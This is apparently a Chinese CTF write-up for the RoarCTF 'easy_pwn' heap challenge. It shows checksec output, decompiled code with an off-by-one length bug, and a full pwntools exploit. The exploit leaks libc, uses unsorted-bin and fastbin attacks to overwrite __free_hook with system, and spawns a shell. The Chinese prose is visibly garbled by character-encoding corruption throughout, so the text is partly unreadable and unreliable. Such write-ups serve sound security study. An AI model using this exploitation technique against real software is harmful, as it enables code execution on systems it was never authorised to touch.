比賽當(dāng)天滿課,登上平臺的時候發(fā)現(xiàn)只剩了16分,賊好奇是什么樣的pwn能被打到16分,先膜一波大師傅們tql!orz
拿到題目首先檢查。。保護全開
ssta@E4x:/media/psf/pwn/roarctf$ checksec easy_pwn
[*] '/media/psf/pwn/roarctf/easy_pwn'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
運行。。emm典型的菜單型堆題。。一開始還沒找到漏洞!?。『髞碓趙rite_note函數(shù)中找到了sub_E26這個處理輸入長度的函數(shù)存在off by one
__int64 sub_E82()
{
unsigned int v1; // [rsp+Ch] [rbp-14h]
signed int v2; // [rsp+Ch] [rbp-14h]
signed int v3; // [rsp+10h] [rbp-10h]
unsigned int v4; // [rsp+14h] [rbp-Ch]
printf("index: ");
v2 = sub_BE0(v1);
v3 = v2;
if ( v2 >= 0 && v2 <= 15 )
{
v2 = *((_DWORD *)&unk_202040 + 4 * v2);
if ( v2 == 1 )
{
printf("size: ");
v2 = sub_BE0(1LL);
v4 = sub_E26(*((_DWORD *)&unk_202044 + 4 * v3), v2);
if ( v2 > 0 )
{
printf("content: ", (unsigned int)v2);
v2 = sub_D92(qword_202048[2 * v3], v4);
}
}
}
return (unsigned int)v2;
}
__int64 __fastcall sub_E26(signed int a1, unsigned int a2)
{
__int64 result; // rax
if ( a1 > (signed int)a2 )
return a2;
if ( a2 - a1 == 10 )
LODWORD(result) = a1 + 1; // 長度比創(chuàng)建chunk時申請的大10返回會多一個字節(jié)!造成offbyone漏洞
else
LODWORD(result) = a1;
return (unsigned int)result;
}
這題還有一點就:用calloc來申請堆塊會將堆塊內(nèi)容置0,相當(dāng)于malloc+memset函數(shù),不過問題不大 233
利用思路:
- 利用off by one構(gòu)造chunk重疊
- 用unsortedbin來leak出libc的地址
- unsortedbin attack 將很大的值寫到free_hook的下方,偽造fastbin(0x7f)
- 利用1步構(gòu)造的重疊堆塊來進行fastbin attack 修改__free_hook 為system地址,同時在chunk內(nèi)寫入/bin/sh字符串
- free掉最后calloc的chunk來起shell
Exp(參考kirin師傅的腳本來寫的):
#!/usr/bin/python
from pwn import *
# context.log_level='debug'
def create(size):
p.sendlineafter('choice: ','1')
p.sendlineafter('size: ',str(size))
def write(idx,size,content):
p.sendlineafter('choice: ','2')
p.sendlineafter('index: ',str(idx))
p.sendlineafter('size: ',str(size))
p.sendafter('content: ',content)
def drop(idx):
p.sendlineafter('choice: ','3')
p.sendlineafter('index: ',str(idx))
def show(idx):
p.sendlineafter('choice: ','4')
p.sendlineafter('index: ',str(idx))
p = process('./easy_pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
elf = ELF('./easy_pwn',checksec=False)
create(0xf8) # 0
create(0x68) # 1
create(0xf8) # 2
create(0x18) # 3
create(0x18) # 4
drop(0)
write(1,0x68+10,'\x00'*0x60+p64(0x170)+'\x20')
drop(2)
#gdb.attach(p)
create(0xf8) # 0
show(1)
p.recvuntil('content: ')
libc_base = u64(p.recv(6).ljust(8,'\x00'))-(0x7ffff7dd1b78-0x7ffff7a0d000)
log.success("libc_base --> [%s]" % hex(libc_base))
free_hook = libc_base + libc.symbols['__free_hook']
log.success("free_hook --> [%s]" %hex(free_hook) )
system_addr = libc_base + libc.symbols['system']
log.success("system addr --> [%s]" % hex(system_addr) )
create(0x68) # 1
create(0xf8) # 2
write(3,16,'\x00'*8+p64(free_hook-0x40-0x10))
create(0x18)
# 1 2
drop(2)
write(1,8,p64(free_hook-0x40-0x10+13))
create(0x68)
create(0x68)
payload = "/bin/sh"+"\x00"*(0x33-7)+p64(system_addr)
write(7,len(payload),payload)
drop(7)
# gdb.attach(p)
p.interactive()
最后的利用方式與techworld ctf線上賽Pwn2一樣,具體可以參考
據(jù)說還有unlink的解法,復(fù)現(xiàn)過后再過來補上??